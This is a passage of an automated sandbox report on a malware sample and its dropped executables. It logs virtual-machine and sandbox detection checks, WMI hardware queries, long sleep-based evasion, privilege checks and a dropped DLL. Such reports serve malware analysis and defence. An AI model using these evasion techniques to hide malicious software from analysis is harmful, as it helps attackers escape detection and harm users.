Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\B29C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ohcompetitive.exe, 0000000D.00000002.726837895.0000000003314000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.000000000331C000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.0000000003300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: q4B165cujP.exe, 00000000.00000002.420545493.0000000000420000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK:^
Source: jfshvii, 00000004.00000002.481859667.0000000000530000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKE

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\q4B165cujP.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\q4B165cujP.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\q4B165cujP.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\q4B165cujP.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\q4B165cujP.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\q4B165cujP.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfshvii	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfshvii	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfshvii	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfshvii	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfshvii	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfshvii	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Windows\explorer.exe TID: 4480	Thread sleep count: 421 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4508	Thread sleep count: 810 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4508	Thread sleep time: -81000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3584	Thread sleep count: 596 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3584	Thread sleep time: -59600s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3544	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6880	Thread sleep count: 429 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6548	Thread sleep count: 781 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6548	Thread sleep time: -78100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6756	Thread sleep count: 592 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6756	Thread sleep time: -59200s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe TID: 4124	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe TID: 6916	Thread sleep count: 192 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe TID: 6916	Thread sleep time: -5760000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe TID: 4664	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe TID: 864	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe TID: 4396	Thread sleep count: 47 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe TID: 4396	Thread sleep time: -8460000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe TID: 6916	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -99800s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 1496	Thread sleep count: 5195 > 30
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -99674s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -99559s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -99439s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -99318s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -99189s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -99060s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -98940s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -98792s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -98675s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -98559s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -98434s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -98290s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -98159s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -97982s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -97833s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -97698s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -97582s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -97465s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -97349s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -97232s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -97117s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -96995s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 4576	Thread sleep time: -96879s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 1272	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 1272	Thread sleep time: -35000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 3844	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe TID: 5716	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe TID: 3772	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6764	Thread sleep count: 187 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6764	Thread sleep time: -187000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe TID: 6188	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe TID: 6272	Thread sleep count: 6386 > 30
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe TID: 6920	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe TID: 6196	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe TID: 6200	Thread sleep count: 3507 > 30
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe TID: 6972	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -99889s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -99766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -99609s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -99452s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -99343s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -99233s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -99124s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -99013s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -98894s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -98767s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -98641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -98512s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -98390s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -98278s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -98170s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -98062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -97953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -97841s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -97734s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -97624s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -97514s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -97395s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -97267s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -97144s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -97017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -96859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -96741s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -96624s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -96515s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -96393s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -96266s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe TID: 752	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 421	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 810	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 596	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 429	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 781	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 592	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 761	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 729	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Window / User API: threadDelayed 5195
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Window / User API: threadDelayed 6386
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Window / User API: threadDelayed 3507
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Window / User API: threadDelayed 6560

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_5-2576
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_6-2579

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe

API coverage: 6.9 %

Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Thread delayed: delay time: 50000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 99800
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 99674
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 99559
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 99439
